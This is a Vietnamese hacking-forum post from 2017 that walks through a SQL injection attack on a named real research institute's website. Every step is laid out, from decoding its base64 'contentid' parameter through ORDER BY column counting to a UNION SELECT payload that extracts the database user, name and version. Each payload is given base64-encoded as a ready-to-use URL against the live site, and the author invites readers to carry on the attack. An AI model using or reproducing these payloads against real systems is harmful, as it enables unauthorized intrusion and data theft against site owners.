SQLi convert Base64.

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 7, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Victim: http://www.cift.res.in/
  Link lối: http://www.cift.res.in/innerlisting.php?contentid=OTQ= :D
  Nhìn quanh, thấy "?contentid=OTQ=" có truyền biến, thử thêm ' --- > không hiện tượng gì:(
  "OTQ=" thấy có dấu = ở cuối (hơi chuối) nghi ngờ là mã hóa base64--->thử phát decode_Base64(OTQ=) = 94 ;) (dùng HackBar addonfirefox cho nhanh)
  Check lỗi: 94' encode = OTQn -->link: http://www.cift.res.in/innercontent.php?contentid=OTQn ok "Error In Connection" giao diện có thay đổi.
  Oder: 94 order by 20000-- - encode = OTQgb3JkZXIgYnkgMjAwMDAtLSAt= --> link: http://www.cift.res.in/innercontent.php?contentid=OTQgb3JkZXIgYnkgMjAwMDAtLSAt= trở lại trạng thái bình thường, thêm dấu ' trở lại.
  Oder: 94' order by 20000-- - encode = OTQnIG9yZGVyIGJ5IDIwMDAwLS0gLQ== -->link: http://www.cift.res.in/innercontent.php?contentid=OTQnIG9yZGVyIGJ5IDIwMDAwLS0gLQ== ok lỗi rồi , tìm số đúng thôi.
  Oder: 94' order by 17-- - encode = OTQnIG9yZGVyIGJ5IDE3LS0gLQ== -->link: http://www.cift.res.in/innercontent.php?contentid=OTQnIG9yZGVyIGJ5IDE3LS0gLQ== lỗi.
  Oder: 94' order by 16-- - encode = OTQnIG9yZGVyIGJ5IDE2LS0gLQ== Hết lỗi! Ok 16
  TÌm số lỗi: -94' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- - encode = LTk0JyBVTklPTiBTRUxFQ1QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYtLSAt
  link: http://www.cift.res.in/innercontent...1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYtLSAt
  Ok số 3 !
  Khai thác: -94' UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16-- -
  encode = LTk0JyBVTklPTiBTRUxFQ1QgMSwyLENPTkNBVF9XUyhDSEFSKDMyLDU4LDMyKSx1c2VyKCksZGF0YWJhc2UoKSx2ZXJzaW9uKCkpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LS0gLQ==

  link: http://www.cift.res.in/innercontent...2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LS0gLQ==

  AE nếu thích thì chiến tiếp!
  Cứ làm như bình thường! :D
  Thanks to chinhnghia_CEH
   

Share This Page